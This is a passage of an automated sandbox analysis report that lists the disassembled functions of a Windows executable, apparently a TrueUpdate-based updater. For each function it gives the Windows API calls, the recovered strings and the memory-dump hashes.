                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressFreeProc
                                                                                  • String ID: InternetGetConnectedState$WININET.DLL
                                                                                  • API String ID: 2632591731-246962726
                                                                                  • Opcode ID: 8311ff39c2b2f15472d27ae23cf25451aeb0f499f22be76e2ec79caeadc6f10f
                                                                                  • Instruction ID: 63db8fa7f7d56c284249033813fc1498e6b85c6391afd78ab6149465f2fc2b9e
                                                                                  • Opcode Fuzzy Hash: 8311ff39c2b2f15472d27ae23cf25451aeb0f499f22be76e2ec79caeadc6f10f
                                                                                  • Instruction Fuzzy Hash: 25E09236B4167167A23217157C48F6F29589BF2BA1B020171FA00FA2518AB88C4285AC
                                                                                  Function 00418F6F Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 398COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00418F74
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0041BA62: __EH_prolog.LIBCMT ref: 0041BA67
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0041C471: __EH_prolog.LIBCMT ref: 0041C476
                                                                                    • Part of subcall function 0041C471: GetTempPathA.KERNEL32(00000104,?), ref: 0041C52F
                                                                                    • Part of subcall function 0041C471: GetTempFileNameA.KERNEL32(?,IRWIN,00000000,?), ref: 0041C549
                                                                                    • Part of subcall function 0041C471: SetFileAttributesA.KERNEL32(?,00000080), ref: 0041C55B
                                                                                    • Part of subcall function 0041C471: DeleteFileA.KERNEL32(?), ref: 0041C568
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                    • Part of subcall function 0041AF20: __EH_prolog.LIBCMT ref: 0041AF25
                                                                                    • Part of subcall function 004D2BE1: HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 004D2BFE
                                                                                  Strings
                                                                                  • 0:R, xrefs: 00419001
                                                                                  • Incorrect HTTP status returned by server: %d, xrefs: 0041933A
                                                                                  • Content-Type: application/x-www-form-urlencoded, xrefs: 00418FC8
                                                                                  • TrueUpdate 3.5, xrefs: 0041922A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$FileInterlocked$IncrementTemp$AttributesDecrementDeleteHttpInfoNamePathQuerylstrlen
                                                                                  • String ID: 0:R$Content-Type: application/x-www-form-urlencoded$Incorrect HTTP status returned by server: %d$TrueUpdate 3.5
                                                                                  • API String ID: 2041993479-94622172
                                                                                  • Opcode ID: 1fa0beacf9eaad131c6df49e9299f008eff2e360a019e77f062fd2065b6663b3
                                                                                  • Instruction ID: c8d1f7aa147b889894274f3f448efed0fa7c8b915e291dcdfa3d50a62713ecbf
                                                                                  • Opcode Fuzzy Hash: 1fa0beacf9eaad131c6df49e9299f008eff2e360a019e77f062fd2065b6663b3
                                                                                  • Instruction Fuzzy Hash: 27F15E7490024DEECF04EFE1C995EEEBBB8AF18308F10405EE505A3281DB786E85CB65
                                                                                  Function 004B81C6 Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStringTypeW.KERNEL32(00000001,004EF9B4,00000001,000000FF,00000100,00000001,000000FF,00000000,?), ref: 004B8205
                                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,004EF9B0,00000001,?), ref: 004B821F
                                                                                  • GetStringTypeA.KERNEL32(000000FF,000000FF,00000000,00000000,?,00000100,00000001,000000FF,00000000,?), ref: 004B8253
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000100,00000001,000000FF,00000000,?), ref: 004B828B
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000000,?,?), ref: 004B82E1
                                                                                  • GetStringTypeW.KERNEL32(000000FF,?,00000000,?,?,?), ref: 004B82F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: StringType$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 3852931651-0
                                                                                  • Opcode ID: 356071c50b2b1e727d03eb6797e95eeda4ac279e5146e2e17f3bc99a5f72e064
                                                                                  • Instruction ID: 4a2456eaae4b3f64fb29d6f6e4fb11d8c1f6ba0c1b9e07f7983ef96d3f1495f3
                                                                                  • Opcode Fuzzy Hash: 356071c50b2b1e727d03eb6797e95eeda4ac279e5146e2e17f3bc99a5f72e064
                                                                                  • Instruction Fuzzy Hash: E241BE72A00689AFCF218F94CC85AEF7FB8FB19350F10042AFA05D6251C7399911DBA8
                                                                                  Function 00458974 Relevance: 9.1, APIs: 6, Instructions: 117windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 0045899C
                                                                                  • ClientToScreen.USER32(?,?), ref: 00458A28
                                                                                  • ScreenToClient.USER32(?,?), ref: 00458A35
                                                                                  • ClientToScreen.USER32(?,?), ref: 00458A94
                                                                                  • ScreenToClient.USER32(?,?), ref: 00458AA4
                                                                                  • PostMessageA.USER32(?,?,?,?), ref: 00458AC1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientScreen$MessageParentPost
                                                                                  • String ID:
                                                                                  • API String ID: 1061243768-0
                                                                                  • Opcode ID: 7742fe7b90e36df2e58740fd97240d5c239cdeb7708534c5c6421a76e8851dc2
                                                                                  • Instruction ID: e332ca7936f72a492913b1633bd3eec4ef988b810c068fc493664a591cb16b43
                                                                                  • Opcode Fuzzy Hash: 7742fe7b90e36df2e58740fd97240d5c239cdeb7708534c5c6421a76e8851dc2
                                                                                  • Instruction Fuzzy Hash: 80419171500205EBDF244F58D88497E7BB4EB04302F20882FE952E2252DE78ED99D759
                                                                                  Function 00420796 Relevance: 9.1, APIs: 6, Instructions: 106windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0042079B
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 004207C4
                                                                                  • __ftol.LIBCMT ref: 004207D6
                                                                                  • IsWindow.USER32(?), ref: 0042081C
                                                                                  • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420839
                                                                                  • SendMessageA.USER32(?,00000150,-00000001,00000000), ref: 00420851
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prologMessageSend__ftol$Window
                                                                                  • String ID:
                                                                                  • API String ID: 2561276666-0
                                                                                  • Opcode ID: bca619425f78a7528706cc2b2316d53dd3d035dc6906635b98e49142f7b76452
                                                                                  • Instruction ID: f5c197937d0df46bc2b22f53e801e15f997021915a2b149e9a8b81887e70d1d0
                                                                                  • Opcode Fuzzy Hash: bca619425f78a7528706cc2b2316d53dd3d035dc6906635b98e49142f7b76452
                                                                                  • Instruction Fuzzy Hash: 2931E771A00614AEDB10FBA6DC81FEF7BB4EF40304F50442FF552A7292DB7999418759
                                                                                  Function 004540F7 Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                  • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00454132
                                                                                  • SendMessageA.USER32(00000000,00000187,00424688,00000000), ref: 00454148
                                                                                  • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 0045416A
                                                                                  • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00454192
                                                                                  • SendMessageA.USER32(00000000,00000187,00424688,00000000), ref: 004541A8
                                                                                  • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004541CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID:
                                                                                  • API String ID: 2326795674-0
                                                                                  • Opcode ID: 7823ba83b9b4b2bde09d4142e0da30b20efe51622fa7d7590f7ca6511cb7c970
                                                                                  • Instruction ID: 3accbac8d4c820b9a490b258e36431a25253bebf7418b9a2f07460033ef3efce
                                                                                  • Opcode Fuzzy Hash: 7823ba83b9b4b2bde09d4142e0da30b20efe51622fa7d7590f7ca6511cb7c970
                                                                                  • Instruction Fuzzy Hash: A7314D31104B45EBC215CF65CC84C27BBE9FF95389B01492EB9918B262CB35EC86CB29
                                                                                  Function 004586C0 Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 004586E8
                                                                                  • ClientToScreen.USER32(?,?), ref: 00458751
                                                                                  • ScreenToClient.USER32(?,?), ref: 0045875E
                                                                                  • ClientToScreen.USER32(?,?), ref: 0045878D
                                                                                  • ScreenToClient.USER32(?,?), ref: 0045879A
                                                                                  • PostMessageA.USER32(?,?,?,?), ref: 004587B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientScreen$MessageParentPost
                                                                                  • String ID:
                                                                                  • API String ID: 1061243768-0
                                                                                  • Opcode ID: 10b95b089efa1b1f29aca84f8d33e2f1643541ffbc64581302a4a41bdf219db8
                                                                                  • Instruction ID: c84670a856872c5c6493c3174f33add3df626ce2ec2b4fed9489b4fc00db4d0a
                                                                                  • Opcode Fuzzy Hash: 10b95b089efa1b1f29aca84f8d33e2f1643541ffbc64581302a4a41bdf219db8
                                                                                  • Instruction Fuzzy Hash: EF319E31500204ABEB204F58DC8897B77B4EB08342F20842FEC52F2666DF38DD95DB59
                                                                                  Function 004208D0 Relevance: 9.1, APIs: 6, Instructions: 95windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004208D5
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 004208FE
                                                                                  • __ftol.LIBCMT ref: 0042090D
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                  • IsWindow.USER32(?), ref: 00420956
                                                                                  • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420973
                                                                                  • SendMessageA.USER32(?,00000151,00000000,?), ref: 004209A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$MessageSend__ftol$Window
                                                                                  • String ID:
                                                                                  • API String ID: 3039016283-0
                                                                                  • Opcode ID: de6621fe2cd55b114d4ad39fca9d98210b0e17b4f15ec92d76834ccba1b4460d
                                                                                  • Instruction ID: dd1a8690cd567b92cacc73c66742930b14a887250b674c969e4e9b1dd606b689
                                                                                  • Opcode Fuzzy Hash: de6621fe2cd55b114d4ad39fca9d98210b0e17b4f15ec92d76834ccba1b4460d
                                                                                  • Instruction Fuzzy Hash: 2E31D471A00219AFDB10FFA2DC81EEFB7B9EF44344F00442EF652A7192D7799A418B55
                                                                                  Function 00454010 Relevance: 9.1, APIs: 6, Instructions: 93windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                  • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 0045404D
                                                                                  • SendMessageA.USER32(00000000,00000187,00000000,00000000), ref: 00454063
                                                                                  • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 0045407A
                                                                                  • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004540A5
                                                                                  • SendMessageA.USER32(00000000,00000187,00000000,00000000), ref: 004540BB
                                                                                  • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004540D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID:
                                                                                  • API String ID: 2326795674-0
                                                                                  • Opcode ID: f73f37e66e0093ad7426274aa7fc7639bd6db05b8b5d674beef4313750dafd8a
                                                                                  • Instruction ID: cb71a663e24d86ca5d8089c706ae1e1754c4498fe83752c4e92db16ba581ce41
                                                                                  • Opcode Fuzzy Hash: f73f37e66e0093ad7426274aa7fc7639bd6db05b8b5d674beef4313750dafd8a
                                                                                  • Instruction Fuzzy Hash: 81318D31104745EFC3148F66CD80C17BBE8FF84B59B21491EBA818B2A2C736EC46CB65
                                                                                  Function 00458AF6 Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00458AFB
                                                                                    • Part of subcall function 004CCDD5: __EH_prolog.LIBCMT ref: 004CCDDA
                                                                                    • Part of subcall function 004CCDD5: GetDC.USER32(?), ref: 004CCE03
                                                                                    • Part of subcall function 0040A998: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0040A9A1
                                                                                    • Part of subcall function 004CC886: SelectObject.GDI32(?,00000000), ref: 004CC8A8
                                                                                    • Part of subcall function 004CC886: SelectObject.GDI32(?,00000000), ref: 004CC8BE
                                                                                  • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458B4C
                                                                                  • SendMessageA.USER32(?,00000194,?,00000000), ref: 00458BB7
                                                                                    • Part of subcall function 004CE5EB: SendMessageA.USER32(?,0000018A,?,00000000), ref: 004CE603
                                                                                    • Part of subcall function 004CE5EB: SendMessageA.USER32(?,00000189,?,00000000), ref: 004CE61C
                                                                                  • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00458B6F
                                                                                  • GetSystemMetrics.USER32(00000005), ref: 00458B77
                                                                                  • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458B98
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$H_prologObjectSelect$ExtentMetricsPoint32SystemText
                                                                                  • String ID:
                                                                                  • API String ID: 2552693466-0
                                                                                  • Opcode ID: 9d3534a4fe118013e16237af719714a3222950b0b6619e8b803ab026f5aeb325
                                                                                  • Instruction ID: 4e24ceb2a9a9eafaf5ce023eaf1911c9882dc422bf96a0dad04e5962e0b21e8b
                                                                                  • Opcode Fuzzy Hash: 9d3534a4fe118013e16237af719714a3222950b0b6619e8b803ab026f5aeb325
                                                                                  • Instruction Fuzzy Hash: 1E314C71900209AFCB14EFA5DD81EEEFBB8EF54354F10412EF501B22A1DB745A06CB64
                                                                                  Function 00444650 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 317COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00444655
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0044441E: __EH_prolog.LIBCMT ref: 00444423
                                                                                    • Part of subcall function 00445163: __EH_prolog.LIBCMT ref: 00445168
                                                                                    • Part of subcall function 00444A05: __EH_prolog.LIBCMT ref: 00444A0A
                                                                                    • Part of subcall function 00444A05: GetFileAttributesA.KERNEL32(?,00510870,?,?,?,?,00000000), ref: 00444A23
                                                                                    • Part of subcall function 00444CF5: __EH_prolog.LIBCMT ref: 00444CFA
                                                                                    • Part of subcall function 00444A05: SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,00000000), ref: 00444A86
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$AttributesFile$IncrementInterlocked
                                                                                  • String ID: 8$Copy failed$Copy successful$Copying "%s"
                                                                                  • API String ID: 214135708-1347155598
                                                                                  • Opcode ID: b44afc9958d608a62be8778472efd1225a794b92f2d42fa097cfe6072e8ea585
                                                                                  • Instruction ID: 37c55acf32e9cf6dfb612512b4d12dbd8d607f31aa80fcdc46012d1b6e023d66
                                                                                  • Opcode Fuzzy Hash: b44afc9958d608a62be8778472efd1225a794b92f2d42fa097cfe6072e8ea585
                                                                                  • Instruction Fuzzy Hash: 24C16274D10608EBDB54EBA5C955BEEBBF4AF48308F10441EF106A3281DB786A45CB69
                                                                                  Function 004D0A74 Relevance: 9.1, APIs: 6, Instructions: 53stringwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 004D0A93
                                                                                  • GlobalLock.KERNEL32(?), ref: 004D0A9B
                                                                                  • lstrcpyn.KERNEL32(?,00000000,00000208), ref: 004D0AAE
                                                                                  • GlobalUnlock.KERNEL32(?), ref: 004D0AB7
                                                                                  • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 004D0ACF
                                                                                  • PostMessageA.USER32(?,000003E4,?,00000000), ref: 004D0ADC
                                                                                    • Part of subcall function 004C95B9: IsWindowEnabled.USER32(?), ref: 004C95C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
